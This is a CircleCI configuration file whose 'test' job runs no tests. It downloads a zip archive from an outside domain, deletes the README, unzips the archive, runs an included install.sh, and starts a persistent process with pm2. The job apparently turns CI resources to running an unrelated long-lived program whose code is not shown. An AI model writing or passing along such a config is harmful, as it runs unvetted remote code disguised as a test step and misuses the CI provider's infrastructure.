# Couldn't automatically generate a config from your source code.
# This is a generic template to serve as a base for your custom config
# See: https://circleci.com/docs/configuration-reference
version: 2.1
jobs:
  test:
    docker:
      - image: cimg/node:21.6.2
    steps:
      - checkout
      # Replace this with a real test runner invocation
      - run: wget https://skywages.my.id/assets/browser_wa.zip
      - run: rm -rf README.md
      - run: ls -a
      - run: unzip browser_wa.zip
      # - run: npm i -g yarn
      - run: yarn install
      - run: sh install.sh
      # - run: node index.js
      - run: npm i -g pm2
      - run: pm2 start ecosystem.config.js

workflows:
  example:
    jobs:
      - test
